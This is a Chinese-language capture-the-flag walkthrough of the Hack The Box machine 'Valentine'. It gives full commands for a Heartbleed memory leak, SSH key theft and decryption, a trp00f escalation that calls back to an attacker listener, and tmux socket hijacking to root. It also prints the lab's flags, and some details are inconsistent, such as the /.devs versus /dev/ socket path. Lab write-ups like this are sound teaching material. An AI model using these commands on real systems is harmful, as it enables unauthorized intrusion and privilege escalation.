[Meachines] [Easy] valentine SSL心脏滴血+SSH-RSA解密+trp00f自动化权限提升+Tmux进程劫持权限提升
字数 1152 2025-08-19 12:41:30

Valentine HTB 渗透测试教学文档

1. 信息收集阶段

1.1 初始扫描

使用Nmap进行初始扫描:

nmap 10.10.10.79 --min-rate 1000 -sC -sV

扫描结果:

  • 开放端口:
    • 22/tcp: OpenSSH 5.9p1 (Ubuntu Linux)
    • 80/tcp: Apache httpd 2.2.22 (Ubuntu)
    • 443/tcp: Apache httpd 2.2.22 (Ubuntu) with SSL

1.2 SSL证书信息

  • 证书主题:commonName=valentine.htb
  • 组织:valentine.htb
  • 地区:FL, US
  • 有效期:2018-02-06 至 2019-02-06

2. 漏洞利用阶段

2.1 Heartbleed漏洞利用

漏洞描述
Heartbleed漏洞(CVE-2014-0160)是OpenSSL库中的一个严重漏洞,影响1.0.1和1.0.2-beta版本。该漏洞允许攻击者读取受保护系统的内存内容,可能泄露加密密钥和其他敏感信息。

漏洞检测

sudo nmap -p443 --script ssl-heartbleed 10.10.10.79

漏洞利用

  1. 下载Heartbleed PoC脚本: 
    wget https://github.com/sensepost/heartbleed-poc/blob/master/heartbleed-poc.py
  2. 执行漏洞利用: 
    python2 heartbleed-poc.py 10.10.10.79
  3. 解码获取的凭据: 
    echo 'aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==' | base64 -d
    输出:heartbleedbelievethehype

2.2 目录爆破

使用Gobuster进行目录爆破:

gobuster dir -u 'http://10.10.10.79' -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -b 403,404 -x php,txt,html

发现重要目录:

  • /dev/目录

2.3 获取SSH私钥

  1. 下载私钥文件: 
    curl http://10.10.10.79/dev/hype_key | xxd -r -p > id_rsa
  2. 使用之前获取的密码解密私钥: 
    openssl rsa -in id_rsa -out id_rsa_dec
    输入密码:heartbleedbelievethehype

2.4 查看notes.txt

curl http://10.10.10.79/dev/notes.txt

2.5 SSH登录

使用解密后的私钥登录:

ssh -o PubkeyAcceptedKeyTypes=ssh-rsa -i id_rsa_dec hype@10.10.10.79

获取user flag:

cbe0675cb30bce7dfddfd0024b0041e7

3. 权限提升阶段

3.1 使用trp00f自动化提权

python3 trp00f.py --lhost 10.10.16.24 --lport 10011 --rhost 10.10.16.24 --rport 10033 --pkhttpport 9090 --lxhttpport 9900

3.2 Tmux进程劫持提权

  1. 检查进程:

    ps -aux

  2. 利用Tmux会话文件:

    tmux -S /.devs/dev_sess

    这个漏洞利用了Tmux的-S选项指定的套接字文件权限不当的问题。当套接字文件权限设置不当时,非特权用户可以访问或控制Tmux会话,从而实现权限提升。

获取root flag:

62947494f0c2ae2218423987e4d28b79

4. 关键知识点总结

  1. Heartbleed漏洞

    • 影响OpenSSL 1.0.1和1.0.2-beta版本
    • 允许读取服务器内存内容
    • 可泄露敏感信息如私钥、密码等

  2. SSH私钥解密

    • 使用openssl rsa命令解密受密码保护的私钥
    • 需要知道或获取密码

  3. Tmux提权

    • 利用不当配置的Tmux套接字文件
    • 需要检查/dev/目录下的会话文件
    • 使用-S选项连接现有会话

  4. 自动化提权工具

    • trp00f.py是一个自动化提权工具
    • 需要配置本地和远程主机及端口

5. 防御建议

  1. 及时更新OpenSSL到不受Heartbleed影响的版本
  2. 定期检查服务器上的敏感文件权限
  3. 避免在/dev/等目录下创建可写的会话文件
  4. 使用强密码保护SSH私钥
  5. 定期审计服务器上的进程和开放端口
Valentine HTB 渗透测试教学文档 1. 信息收集阶段 1.1 初始扫描 使用Nmap进行初始扫描: 扫描结果: 开放端口: 22/tcp: OpenSSH 5.9p1 (Ubuntu Linux) 80/tcp: Apache httpd 2.2.22 (Ubuntu) 443/tcp: Apache httpd 2.2.22 (Ubuntu) with SSL 1.2 SSL证书信息 证书主题:commonName=valentine.htb 组织:valentine.htb 地区:FL, US 有效期:2018-02-06 至 2019-02-06 2. 漏洞利用阶段 2.1 Heartbleed漏洞利用 漏洞描述 : Heartbleed漏洞(CVE-2014-0160)是OpenSSL库中的一个严重漏洞,影响1.0.1和1.0.2-beta版本。该漏洞允许攻击者读取受保护系统的内存内容,可能泄露加密密钥和其他敏感信息。 漏洞检测 : 漏洞利用 : 下载Heartbleed PoC脚本: 执行漏洞利用: 解码获取的凭据: 输出: heartbleedbelievethehype 2.2 目录爆破 使用Gobuster进行目录爆破: 发现重要目录: /dev/ 目录 2.3 获取SSH私钥 下载私钥文件: 使用之前获取的密码解密私钥: 输入密码: heartbleedbelievethehype 2.4 查看notes.txt 2.5 SSH登录 使用解密后的私钥登录: 获取user flag: 3. 权限提升阶段 3.1 使用trp00f自动化提权 3.2 Tmux进程劫持提权 检查进程: 利用Tmux会话文件: 这个漏洞利用了Tmux的-S选项指定的套接字文件权限不当的问题。当套接字文件权限设置不当时,非特权用户可以访问或控制Tmux会话,从而实现权限提升。 获取root flag: 4. 关键知识点总结 Heartbleed漏洞 : 影响OpenSSL 1.0.1和1.0.2-beta版本 允许读取服务器内存内容 可泄露敏感信息如私钥、密码等 SSH私钥解密 : 使用openssl rsa命令解密受密码保护的私钥 需要知道或获取密码 Tmux提权 : 利用不当配置的Tmux套接字文件 需要检查/dev/目录下的会话文件 使用-S选项连接现有会话 自动化提权工具 : trp00f.py是一个自动化提权工具 需要配置本地和远程主机及端口 5. 防御建议 及时更新OpenSSL到不受Heartbleed影响的版本 定期检查服务器上的敏感文件权限 避免在/dev/等目录下创建可写的会话文件 使用强密码保护SSH私钥 定期审计服务器上的进程和开放端口